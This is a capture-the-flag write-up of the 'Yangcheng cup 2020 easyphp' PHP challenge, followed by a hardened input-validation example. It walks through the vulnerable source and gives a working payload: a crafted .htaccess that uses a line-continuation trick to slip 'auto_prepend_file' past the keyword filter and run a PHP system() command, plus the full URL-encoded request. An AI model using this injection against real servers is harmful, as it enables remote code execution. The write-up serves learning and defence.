[Yangcheng cup 2020] easyphp
2022-07-02 23:02:00 【-Gardenia blue-】
<?php
$files = scandir('./');
foreach($files as $file) {
    if(is_file($file)){
        if ($file !== "index.php") {
            unlink($file);
        }
    }
}
if(!isset($_GET['content']) || !isset($_GET['filename'])) {
    highlight_file(__FILE__);
    die();
}
$content = $_GET['content'];
if(stristr($content,'on') || stristr($content,'html') || stristr($content,'type') || stristr($content,'flag') || stristr($content,'upload') || stristr($content,'file')) {
    echo "Hacker";
    die();
}
$filename = $_GET['filename'];
if(preg_match("/[^a-z\.]/", $filename) == 1) {
    echo "Hacker";
    die();
}
$files = scandir('./');
foreach($files as $file) {
    if(is_file($file)){
        if ($file !== "index.php") {
            unlink($file);
        }
    }
}
file_put_contents($filename, $content . "\nHello, world");
?>
Code audit
$files = scandir('./');
foreach($files as $file) {
    if(is_file($file)){
        if ($file !== "index.php") {
            unlink($file);
        }
    }
}
Every file in the directory other than index.php is deleted.
if(!isset($_GET['content']) || !isset($_GET['filename'])) {
    highlight_file(__FILE__);
    die();
}
If either the content or the filename parameter is missing, the source is shown and the script dies.
$content = $_GET['content'];
if(stristr($content,'on') || stristr($content,'html') || stristr($content,'type') || stristr($content,'flag') || stristr($content,'upload') || stristr($content,'file')) {
    echo "Hacker";
    die();
}
The content parameter is filtered: it must not contain on, html, type, flag, upload or file (stristr, so the check is case-insensitive).
$filename = $_GET['filename'];
if(preg_match("/[^a-z\.]/", $filename) == 1) {
    echo "Hacker";
    die();
}
The filename parameter is filtered: it may consist only of lowercase letters and "."; anything else dies.
$files = scandir('./');
foreach($files as $file) {
    if(is_file($file)){
        if ($file !== "index.php") {
            unlink($file);
        }
    }
}
Same as the cleanup at the top: everything except index.php is deleted again.
file_put_contents($filename, $content . "\nHello, world");
The content we pass in is written into the file named by filename.
Note that "\nHello, world" is appended to whatever we write; that trailing line will break the parsing of the file we create.
My first idea was filename=a.php with a one-line webshell as content. In practice:
The file is served as plain text and not parsed as PHP. Presumably only index.php is configured to be parsed on the server; after all, the code takes a lot of care around index.php. So the question became whether index.php would honour an .htaccess we write, i.e. whether we could just change a configuration item. From a more experienced player's writeup I learned that .htaccess is indeed the intended way to get the flag.
php_value auto_prepend_fil\
e .htaccess
#<?php system('cat /fla?');?>\
In .htaccess a trailing "\" joins a line with the next one, so the first two lines are read as php_value auto_prepend_file .htaccess.
The word file is split across the line break so that it gets past the content filter.
The one-liner is placed inside a "#" comment: in .htaccess "#" starts a comment, but when PHP prepends the file, the PHP tag inside the comment is executed.
The "\" at the end of the third line joins the appended "Hello, world" onto the comment line; otherwise "Hello, world" would land on a fourth line and cause an error.
?filename=.htaccess&content=php_value%20auto_prepend_fil%5C%0Ae%20.htaccess%0A%23%3C%3Fphp%20system('cat%20/fla?')%3B%3F%3E%5C
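As an added example (not part of the original writeup or the challenge source), hardened versions of the two checks audited above. They show why a keyword filter on the raw string is beaten by Apache's line continuation and why a character blacklist on the filename still lets ".htaccess" through. Function names and the allowed extension list are my own assumptions.

```php
<?php
// Hardened replacements for the challenge's two input checks (added example,
// not the original code). Inputs are the same $_GET['content'] / $_GET['filename'].

// Apache reads a line ending in "\" as continued on the next line, so
// "fil\" + newline + "e" is the directive word "file". Fold continuations
// the same way Apache does before looking for forbidden words.
function normalize_htaccess_continuations(string $content): string {
    return preg_replace('/\\\\\r?\n/', '', $content);
}

function content_is_forbidden(string $content): bool {
    $flat = normalize_htaccess_continuations($content);
    foreach (['on', 'html', 'type', 'flag', 'upload', 'file'] as $word) {
        if (stristr($flat, $word) !== false) {
            return true;
        }
    }
    return false;
}

// The original /[^a-z\.]/ blacklist accepts ".htaccess" and "index.php".
// An allowlist of shape (no path components, no leading dot, one extension
// from a fixed non-executable set) is what a defender wants instead.
function filename_is_allowed(string $filename): bool {
    if ($filename !== basename($filename)) {
        return false;                                   // path traversal
    }
    // Leading-dot names (server config files) and .php are rejected here.
    return preg_match('/^[a-z]{1,32}\.(txt|md|log)$/', $filename) === 1;
}

// Constructed sample inputs: the first one is the split-keyword trick from the
// writeup (without any payload), which the naive stristr() check misses.
$split = "php_value auto_prepend_fil\\\ne .htaccess";
$plain = "just some text";

var_dump(content_is_forbidden($split));     // split "fil\ e" is folded and caught
var_dump(content_is_forbidden($plain));     // harmless content passes
var_dump(filename_is_allowed('.htaccess')); // dotfile rejected by the allowlist
var_dump(filename_is_allowed('notes.txt')); // plain data file accepted
```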